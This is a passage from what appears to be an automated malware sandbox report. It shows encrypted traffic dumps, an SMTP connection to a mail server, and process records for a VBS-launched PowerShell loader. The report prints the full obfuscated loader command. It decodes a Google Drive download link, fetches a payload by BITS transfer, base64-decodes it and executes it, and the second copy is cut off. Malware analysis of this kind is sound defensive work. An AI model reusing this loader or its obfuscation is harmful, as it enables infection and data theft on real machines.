                                      Data Ascii: _qPtPzX8M+NO}RbUB_9{XkyVfKiVwz[0-88S{}%CL*TfIt\t\OX2aum5S!T%bOtM'>Xnu`U{[>/eKB2kq-E&x3XW2\)rqh}z[;`AG
                                      2023-10-26 07:03:21 UTC235INData Raw: ba f5 1d 8e a2 d5 53 28 87 c5 72 48 86 ac ef 00 d5 15 bd 8b fb e5 d2 11 bd fb bf da 92 e2 8d 4b 6b bb c0 e5 5f 89 e3 5c b4 ac 19 8c e5 69 86 9e 17 46 65 55 ad 41 f5 ea c0 2e 93 a3 51 c2 79 1e dc c9 f1 2e e3 9e a9 4f 05 d7 0c b4 18 5c e7 4e 2a 27 11 a7 d7 f4 43 4b e7 a0 27 0f 27 b9 98 6f 51 38 2b 9f 9f 54 ab 61 81 d0 26 94 ce a4 02 f6 23 c4 c7 70 77 97 fe c6 b3 43 9d 62 4f 0a fd c8 18 b8 ed 20 11 fb 3c 2b e2 7d 31 b6 c3 19 5b a4 68 31 ca 4b 02 38 56 64 92 d7 e2 70 36 d6 69 70 fd 2a 12 b1 ce f4 9b bf 13 f6 bf 28 7f 74 7b b8 a4 74 6b ae ab 42 43 fe 57 39 0a 2e 5d 4b 26 27 d5 f6 5f d2 77 c4 38 46 93 2d 00 d1 33 00 35 eb c2 3e b7 d2 61 3c 78 f6 1a 41 f2 82 44 b7 10 c2 e7 fe 35 47 72 75 b6 a8 ff d2 73 bc d3 84 a1 7f 32 51 8c 07 e7 a0 da c0 2a 1b 88 3f 74 bc 5b
                                      Data Ascii: S(rHKk_\iFeUA.Qy.O\N*'CK''oQ8+Ta&#pwCbO <+}1[h1K8Vdp6ip*(t{tkBCW9.]K&'_w8F-35>a<xAD5Grus2Q*?t[
                                      2023-10-26 07:03:21 UTC236INData Raw: fc 47 38 e7 5a 75 f6 51 e0 e4 f5 d5 c1 ef cc 6e 2b 2f 30 b4 88 2f 17 83 a6 8f 2c ff eb b9 f2 de dd 1d b0 88 52 3f 7c 19 81 89 eb 80 44 07 63 e4 34 64 25 06 4c a4 67 53 b6 c1 3f 8d 59 fd 37 39 b4 71 b4 40 a6 80 3a d0 de 1e 84 75 9a 6c 31 82 57 07 79 6d 18 68 23 e6 a8 8a d4 17 1f 39 18 ba fe 32 8d ea d5 26 22 ea c1 1c 54 94 b2 89 11 a1 00 c6 8d 9d b9 fe 17 c7 9b ce da fe e3 f3 52 6f b2 ba e4 61 8a 9e 5c 80 a8 19 96 ad 67 eb 98 6b 44 0e 57 cf 47 90 f6 8b 28 df a0 6b c2 41 19 a7 ca c9 36 8c 83 a1 7e 56 d6 70 ac 72 5c 94 4c 56 22 7f a7 b6 f6 08 56 87 a9 4d 06 40 93 aa 6e 79 30 50 9b a6 4c ce 73 bc d8 08 94 fc ac 62 e6 50 c0 f7 71 55 9f aa c6 c9 4b bd 6b 52 2e b9 d5 75 b1 87 21 77 f1 55 2d 85 73 51 b8 eb 04 73 aa 5c 31 b3 49 77 28 66 6c aa d9 a8 6d 43 c6 60 23
                                      Data Ascii: G8ZuQn+/0/,R?|Dc4d%LgS?Y79q@:ul1Wymh#92&"TRoa\gkDWG(kA6~Vpr\LV"VM@ny0PLsbPqUKkR.u!wU-sQs\1Iw(flmC`#
                                      2023-10-26 07:03:21 UTC237INData Raw: d9 69 60 7e 58 5c 0b 37 ee 41 54 10 f9 52 8c 7a 57 11 00 53 57 42 d7 06 1b 11 ed 82 4f 0b c5 42 7d 84 6c 26 b4 dc cd 53 43 37 ff 6d 73 2c e3 c5 ad fc 92 93 70 47 e7 ba 64 86 be 58 a3 8f 1a c8 49 cc 15 92 80 50 29 a0 a2 00 b9 63 e5 97 a7 37 92 70 3e 25 50 f6 52 4b 9c 17 63 22 31 72 af 99 45 40 fa 3a 64 b3 59 93 e6 91 d0 af ea a9 0b 49 0f 5c a6 29 5b 62 86 c3 89 53 7e ff bd ae de b8 1d 98 8e 2e 2d 5f 18 f5 08 f0 85 16 07 1f 65 25 62 71 07 24 b5 89 23 dc e1 10 8c 51 f4 17 39 13 ad 1c 4e 82 57 49 9c 50 65 18 f6 7c f9 81 64 d6 7b ca 37 44 23 3f d7 68 02 d6 0c 08 35 33 ba ef b2 fe c9 fd 27 20 e3 ed 1e 5d 94 f2 9a 12 31 61 c1 a3 8f f8 f8 14 f5 f9 c5 d4 f1 ea e1 48 65 bc a6 e0 72 8c 97 5c 8d a2 04 92 be 6c f4 9b 6f 46 0b 48 c9 5c 84 f7 8c 33 d2 a0 6d d0 30 14 87
                                      Data Ascii: i`~X\7ATRzWSWBOB}l&SC7ms,pGdXIP)c7p>%PRKc"1rE@:dYI\)[bS~.-_e%bq$#Q9NWIPe|d{7D#?h53' ]1aHer\loFH\3m0
                                      2023-10-26 07:03:21 UTC238INData Raw: 92 32 76 07 61 64 84 63 e5 22 91 f7 55 2e c3 f6 eb 96 90 56 f5 5b aa 76 02 13 e3 19 ac 37 9d 0f 30 65 24 a6 91 53 69 bb 44 f9 08 98 a3 13 8a 3f 6e 89 cf de 63 db e0 ff 2e c8 92 4b 1f 23 2a 6a 97 85 99 c4 56 1d 73 80 77 f8 36 12 ce 8e 79 65 23 40 97 ab af 3b 4d 9f c5 01 c5 34 65 fb c0 c7 60 6a 71 5d 5b 07 29 fa 50 d0 4e e4 4c 98 7b df 69 03 73 54 5d ca 18 14 37 ef 88 56 81 c8 7a 77 8e 66 3f 36 10 c3 46 49 1f ff 70 68 3b 9e c5 ad fa 94 96 51 50 fb ef 68 8a 90 4c b9 da 1c e0 46 c7 1f 97 b5 43 75 a9 ae 2e b0 65 ed 82 05 1a 94 7d 2d a1 6a fa e4 65 41 5c 76 f1 2a ca 90 9d 41 5f 65 03 71 d0 40 11 a4 88 d3 a3 6d fc 66 4f 2f 55 b4 a8 2f 7f 83 d9 8e 42 fe 8f ed 9c c8 ef 6f f1 f8 75 50 7c 5c 9f ea e1 f0 42 6e 61 8a 01 0c 23 69 52 d7 09 5f d9 c1 16 bc 77 cd 19 09 28
                                      Data Ascii: 2vadc"U.V[v70e$SiD?nc.K#*jVsw6ye#@;M4e`jq][)PNL{isT]7Vzwf?6FIph;QPhLFCu.e}-jeA\v*A_eq@mfO/U/BouP|\Bna#iR_w(
                                      2023-10-26 07:03:21 UTC239INData Raw: 84 09 69 4e b0 93 5a d5 1e 54 05 55 f8 c5 2d 47 c4 61 6c b7 b4 92 c9 7d 4f 1b f3 5c fb 66 86 3e 92 74 aa 74 f1 cc a3 88 16 6a 8c 2c ff f4 d1 e0 c4 c2 6e 61 0b dc 06 95 ab c9 d4 e4 f1 1f 04 4c 0c b7 f9 94 c4 04 2b 9b 20 f7 0c fc 49 c7 f5 f0 d1 97 cd 0f 5b 35 d2 7c 3f 21 12 6b aa 16 d9 b9 36 56 06 79 47 86 7e e0 2b 91 f3 47 a7 39 e9 f9 09 99 46 f5 4f a2 7b 07 1f d3 9f 5b 33 0d 5a 29 7f b5 92 8b d2 e7 ad 48 75 16 88 b7 0c 97 2a ed ad c2 d4 3e c2 fb 7c 03 57 85 44 19 00 22 79 8b 85 93 ef 51 16 7e 8a 22 e8 a6 93 fb 89 79 6a 25 cb c3 a6 b9 2d 52 0f 40 34 d9 2f 22 fa d5 5e 52 7e 7b 4d 54 2e 30 e1 d1 40 42 f9 74 91 79 57 e8 03 53 57 4d 53 95 16 61 e8 90 52 11 8d 63 6d 0f 58 20 b9 f2 c3 55 55 96 b3 65 6f 74 c1 c9 b1 75 a6 98 5e 4b fb 33 56 90 1f 65 b6 89 16 e6 46
                                      Data Ascii: iNZTU-Gal}O\f>ttj,naL+ I[5|?!k6VyG~+G9FO{[3Z)Hu*>|WD"yQ~"yj%-R@4/"^R~{MT.0@BtyWSWMSaRcmX UUeotu^K3VeF
                                      2023-10-26 07:03:21 UTC241INData Raw: 1f a3 f5 4c 08 2c 79 98 fd 28 d0 ac 42 1c 12 a6 89 3b ea 30 37 41 ac b4 32 16 94 44 51 c8 99 23 ae 2f 8c 29 6c 9d ef 78 26 f7 ce 43 61 85 16 4f a6 89 22 59 6e f0 73 ce c3 54 ab 82 3a d0 69 83 71 bf 8b 4f 4e 4a 87 e7 b7 1b 1f a5 6b 0b 82 4f ad 46 43 d6 fa 77 c3 81 1a a9 d5 94 26 e9 ee dd 20 75 11 30 d5 c6 ec 0b 54 03 4e fb c4 f0 5b d8 e8 a9 b0 b4 9d d9 4f 02 07 f2 dd 26 4e 93 3d 93 10 9a 61 67 01 9e c2 19 6d 1f 5d e3 e8 4d d9 c4 c2 6e a0 0b dc 06 24 ab d5 40 78 7e ab 03 50 98 99 b9 98 d7 04 36 97 af 56 13 fc 4f c7 f5 f0 d1 97 cd 1a 5c 3b c7 e8 a0 a6 97 68 b6 99 53 a2 23 f7 ae 67 47 8a 68 e2 26 9f fc 4a a7 31 e0 f2 1a 94 4b fd 49 aa 74 0a 04 f5 91 5e 3b 1a 05 a9 90 26 2f 20 4e 6f ad 47 fa e5 94 a2 03 8d 28 79 83 9a c7 61 42 d5 e0 31 44 9b 42 11 2e 2d 6a 8b
                                      Data Ascii: L,y(B;07A2DQ#/)lx&CaO"YnsT:iqONJkOFCw& u0TN[O&N=agm]Mn$@x~P6VO\;hS#gGh&J1KIt^;&/ NoG(yaB1DB.-j
                                      2023-10-26 07:03:21 UTC242INData Raw: a2 a7 c1 2f 12 c9 25 da 4f 7b 72 a4 bf e0 78 5f bd 03 e0 4c cb 79 a0 68 fb ce ee e9 54 aa 18 a9 58 9c 55 6b cb 87 22 5c 4b 83 dc a8 80 b1 dd 88 d3 b6 7c 7d 39 a6 dc df 33 c1 19 98 66 01 64 5a 8e 5b 9d 51 01 33 a1 54 01 65 b9 b2 a6 f5 33 c0 f9 f2 2e 69 77 81 aa 06 05 75 1f a6 a4 da 62 13 a7 ee 42 59 31 61 1e f6 28 cd a0 c1 f5 1b bc 00 33 de 36 37 4c bb 16 72 0a 8c 55 f4 76 98 34 a9 bf e8 3a ff 61 db 73 28 f9 c1 cf 2e b8 1f 4a ae 95 61 4a fd 4d 52 d2 4a c4 a6 8d b5 55 7a 8e 6b 39 b0 5f 52 04 88 fd 3e 0d 05 a6 76 11 db 49 b1 cf 77 d0 fa 7a d0 90 86 75 c9 16 07 f8 61 0d 3b 6f 54 35 e7 47 cd 15 59 01 5a e9 5f 16 51 df 7b 3c b8 ae 1b f0 53 41 0e e8 52 f0 48 94 ad 2f e4 89 3e e7 cb 30 f9 1f 66 0a 17 f7 e8 81 e4 d8 51 d3 e2 17 4f cb 16 b7 5a 69 7c ee 83 a8 5c 83
                                      Data Ascii: /%O{rx_LyhTXUk"\K|}93fdZ[Q3Te3.iwubBY1a(367LrUv4:as(.JaJMRJUzk9_R>vIwzua;oT5GYZ_Q{<SARH/>0fQOZi|\
                                      2023-10-26 07:03:21 UTC243INData Raw: a0 66 06 18 d2 ca cf d4 fd 01 d1 1f 90 54 c4 7a 13 63 b1 54 31 49 6c 91 e4 b2 66 f2 4c f9 3b f0 a9 5b 70 78 34 d2 b0 27 c3 1a 6b 71 89 5b d7 c4 11 d7 4d 3a 3e a1 6b 5c 75 3f 55 92 10 90 99 85 bd d4 37 35 3f e5 d7 80 34 41 91 55 0a 8c cb 98 8d e2 82 a3 0b a0 2c 31 c7 71 88 85 a0 ce fb a5 aa e6 21 1a dd 56 59 a1 66 64 b7 32 08 67 36 b3 0a f0 4c 07 85 af ec e1 48 06 f5 11 a6 0d 2d 42 15 bd 67 4e 74 a2 b3 d7 8e ff a7 8c a1 d2 c0 da ac f5 49 34 a2 c0 d2 34 d4 9e cd 76 1b 21 53 94 d2 9a 44 86 22 b1 5b 49 79 ae 3b 92 e8 2d 47 11 eb 24 f0 66 8c b2 8d 9c 7d 08 e3 ac c0 e7 1f a1 fa 48 13 37 77 87 f3 3d dd b9 4c 13 1d b3 84 37 d2 2c 3a 4b b4 89 36 1f 8e 40 71 c7 83 30 be 35 d2 2f 74 14 ce 73 35 fc db 50 6a 85 05 44 b3 9a 31 4e e7 c4 6a c0 cb 5b c5 87 33 c9 7a 88 70
                                      Data Ascii: fTzcT1IlfL;[px4'kq[M:>k\u?U75?4AU,1q!VYfd2g6LH-BgNtI44v!SD"[Iy;-G$f}H7w=L7,:K6@q05/ts5PjD1Nj[3zp
                                      2023-10-26 07:03:21 UTC244INData Raw: 38 cf 8d 89 e8 7f c1 42 1a 39 7d e5 38 ed 08 cb 56 e2 52 43 e7 a2 82 de 82 d7 2f a8 07 0a 8c e4 ac c8 9a c2 d7 c9 4e a6 f0 26 63 eb 7c 31 87 a5 9d 5f ba 4f ca 02 a4 bc 44 bd a4 b0 3c 3a 4e 84 46 c2 25 65 36 53 c5 d3 4c b3 d4 88 05 bf 36 c4 d2 ca 90 5d 20 b2 9e 55 cf f0 7e 81 b1 5a a3 af f5 53 64 ca 4c be ce 61 70 cb 8c 65 91 4d 05 1c 48 a7 da cf 4c 66 94 e3 bd 7b f8 d0 88 22 4b de 49 60 62 64 d6 aa bb f7 00 ff 51 07 a8 57 e7 85 b1 18 3e 16 ad 6c 50 1a 21 55 89 10 91 94 99 bd d4 72 39 02 ea dd 89 33 c6 78 49 1d 1f 78 8c 8e e2 a2 b3 82 53 20 b5 39 f8 39 82 30 b3 12 ab bf 60 1e 01 cd 56 85 5e 73 6f a2 a6 e4 eb 03 bd 05 fb 58 93 69 d3 eb fb c7 fc db 1b a9 04 39 d1 61 47 6f 59 2b 22 5c 4b ba f1 af 8b b9 dd 44 e3 b7 fa 48 39 b5 cf cf 2f 8e 9a de 7d 01 34 55 92
                                      Data Ascii: 8B9}8VRC/N&c|1_OD<:NF%e6SL6] U~ZSdLapeMHLf{"KI`bdQW>lP!Ur93xIxS 990`V^soXi9aGoY+"\KDH9/}4U
                                      2023-10-26 07:03:21 UTC246INData Raw: 38 62 fb 2e e0 a7 47 db d0 ba 4a 92 59 bd d9 71 47 c5 b4 2f 1f 03 f4 d7 0f 4c 23 3d 80 08 a7 6b 63 1c 3c 85 e5 8a cb 54 5e 15 96 d2 90 cc 65 67 49 69 63 fd 8e a8 dd bb 55 a4 d8 60 2d 31 6e b3 c3 65 64 e6 ac 5c 1d 73 bb f1 12 e2 9f 1c eb 22 3e 48 34 4e 4b 48 e1 f5 90 62 49 d3 2a 9c 97 25 a2 90 fe ee 1a c3 37 07 52 75 82 38 83 03 98 53 8b 54 2e e5 cb 9f db 8a e6 2f 93 0a 23 89 88 a9 f8 9b b1 a2 fa 4b c2 f1 16 66 d4 6d 02 8f 81 1c 89 b3 6b d7 33 b5 0e 88 c1 a1 cb 3f 1f 4d bb 47 f9 29 53 33 71 44 1a 45 92 55 7d 18 88 3e a5 c7 bb dd 38 32 01 4a 6a c8 96 6c 39 59 6b aa 8d 74 a9 6c a5 4b c3 c6 19 75 c3 9e e4 45 6d 0a 19 42 b7 5b 6f 54 1b 8c 86 b7 02 e0 a1 8d 69 71 b6 46 05 70 50 d7 ca 3a af 12 19 60 61 ba a2 d6 90 a3 65 3c 1e a3 05 41 52 23 5c 87 4e 10 0a 84 c6
                                      Data Ascii: 8b.GJYqG/L#=kc<T^egIicU`-1ned\s">H4NKHbI*%7Ru8ST./#Kfmk3?MG)S3qDEU}>82Jjl9YktlKuEmB[oTiqFpP:`ae<AR#\N
                                      2023-10-26 07:03:21 UTC247INData Raw: d7 d3 fb 8e 10 99 c8 db 0c 91 3e a9 ab cc 7b 8b 97 96 a1 fb 3a 72 24 aa b6 d6 3f 19 46 d3 8a 07 bd 27 ff 63 c1 f1 02 69 8c 3e d9 2a 65 2c bc 43 3c 9b 94 7a 6e a0 d8 ef 30 87 dd 03 c3 f5 4b 3a 29 8f a1 47 79 67 f7 c5 f3 95 59 1b c9 b7 40 c2 5b 26 2f 02 17 6d bc 14 c6 f1 e3 87 77 7c 62 39 62 bd 2e 89 a7 2b db b5 ba 0e 92 3c bd aa 71 24 c5 c6 2f 76 03 84 d7 7b 4c 4a 3d ef 08 c9 6b 63 1c 3c 85 c5 8a cb 54 6e 15 9e d2 91 cc 23 67 20 69 0f fd eb a8 8b bb 30 a4 aa 60 5e 31 07 b3 ac 65 0a e6 ac 5c 1d 73 8a f1 3c e2 af 1c c5 22 0e 48 1a 4e 7b 48 e1 f5 e4 62 60 d3 2b 9c de 25 cc 90 8a ee 7f c3 45 07 3c 75 e3 38 ef 03 d6 53 ea 54 43 e5 ae 9f db 8a d1 2f aa 0a 17 89 ec a9 c8 9b d3 a2 c3 4b a6 f1 3b 66 ec 6d 36 8f b7 1c bf b3 46 d7 07 b5 3d 88 a0 a1 ad 3f 32 4d 83 47
                                      Data Ascii: >{:r$?F'ci>*e,C<zn0K:)GygY@[&/mw|b9b.+<q$/v{LJ=kc<Tn#g i0`^1e\s<"HN{Hb`+%E<u8STC/K;fm6F=?2MG


                                      SMTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Oct 26, 2023 09:03:34.008212090 CEST58749725142.44.240.172192.168.2.11220 vps.mateocorp.com ESMTP Postfix (Ubuntu)
                                      Oct 26, 2023 09:03:34.008790016 CEST49725587192.168.2.11142.44.240.172EHLO 414408
                                      Oct 26, 2023 09:03:34.131376028 CEST58749725142.44.240.172192.168.2.11250-vps.mateocorp.com
                                      250-PIPELINING
                                      250-SIZE 25600000
                                      250-ETRN
                                      250-STARTTLS
                                      250-ENHANCEDSTATUSCODES
                                      250-8BITMIME
                                      250-DSN
                                      250 CHUNKING
                                      Oct 26, 2023 09:03:34.131664991 CEST49725587192.168.2.11142.44.240.172STARTTLS
                                      Oct 26, 2023 09:03:34.248552084 CEST58749725142.44.240.172192.168.2.11220 2.0.0 Ready to start TLS

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:09:02:32
                                      Start date:26/10/2023
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tagdk.vbs"
                                      Imagebase:0x7ff7f4fc0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:09:02:33
                                      Start date:26/10/2023
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & ($Skotskterr01) (Propje9 'AracIPyrim MicpAedioIntrrhellt Opr- ToaM SkyoAflvdMugwu GarlPuckeFitt DigtB TapiBekltSprnsFrysTUgleranveaMonon Nons Ellfelece Avlr Skk ') ;$Ratioeravi2=$Ratioeravi2+'\blyantss.Ned';while (-not $Badehusesv) { .($Skotskterr01) (Propje9 'Helo$CleaBSiksaSigtdSlouetrikhDespuDogtsSgepeRorisSerovVand=Pssi(TrouTdemoeKortsTrant Teg-FjerPRetua RectDuleh fer Opfr$UnvaRMicraovert BeviSerioVille SqurVashaSerrvHeteiPalm2Nonl)Indi ') ; . ($Skotskterr01) $Skotskterr00; . ($Skotskterr01) (Propje9 'micrS WootOutgaHepar LibtBela-GtzsS BunlAdkoeOpdrePythpSolv Brod5Ecth ');} & ($Skotskterr01) (Propje9 'Unde$stemPLevorEpopoOvnhpBanajKegleLege Rrte= The KidlGPoneeSuprtAdmi- skaCFresoResenGudetTeodeBorsn Tavt Tyk Miap$CardRCursahydrt LociNanzoUndeeDeakrTegnaInvevsampi Dev2 Pat '); . ($Skotskterr01) (Propje9 'Vkke$ReceBDrvloMiddlNedtdPicksOblipOccliPrel Sint=Dair Lim[ AugSVipsy UndsBasitbaggeSpenmSkrm.VidoCDustoTamtn SkjvIlsaeForprPebbt Slu] Nor:Cata:AdmiFLambr SudoGaramaftaBAmataRendsSkoceSmel6anel4SibeSForntMonorAquaiWharnMiddgSikk(Iken$GldsPExosrRopeoKvlspMultjBerteunim)Tros '); & ($Skotskterr01) (Propje9 'Hngs$AxedSParakSpiloUnintKrydsMillkPukrtaquoe TabrTurarImpl2Puck Vrim=tran Smit[DiscSSekuyVamps InitSkuleMegam Sku.KidnT Oble deix OdotOrty.AntiESwagnvexecFaktoGrifdMartiNonhn undgAnti]Brug:Vels:ElleA epiSEvodCAgraISuppIUnna.AndrGDoweeJudatOlieSHypot OborNonaiStyrn AergSpil( Fly$ForsB BlooFamilExpedCharsUndepAraciBago)Cyke '); .($Skotskterr01) (Propje9 'Hist$MandAZigzmStyroTdrarTypo=Four$ OveS Merkbicoo SvetGunssRadbk ColtLavteIschrDobbrForh2Adva.Encysplejuspukb KomsDeuttIronrunifiUnwinMonogForz(Mons2 Cre5Raad6Taal3Repa1Anve1Cata,Utru2Lign8Spal4 Voy3Lysi0Synd)Bobs '); & ($Skotskterr01) $Amor;}
                                      Imagebase:0x7ff6eb350000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:09:02:33
                                      Start date:26/10/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff68cce0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:09:02:35
                                      Start date:26/10/2023
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & 